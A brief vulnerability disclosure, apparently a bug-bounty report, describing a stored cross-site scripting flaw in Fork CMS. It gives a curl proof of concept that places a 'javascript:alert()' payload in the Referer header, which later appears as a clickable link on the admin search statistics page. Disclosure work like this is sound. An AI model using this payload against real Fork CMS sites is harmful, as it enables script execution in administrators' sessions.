✍️ Description

The forkcms is vulnerable to XSS through search request. It is possible to set the HTTP referer header to javascript:.

🕵️‍♂️ Proof of Concept

Execute the following command (localhost):

curl -H 'Referer: javascript:alert()' 'http://localhost/search?form=search&q_widget=poc&submit=search'

With an authenticated user, access http://localhost/private/en/search/statistics.

Click on javascript:alert().

PoC image: https://i.imgur.com/EIMofDE.png

💥 Impact

The attackers can execute arbitrary JS code.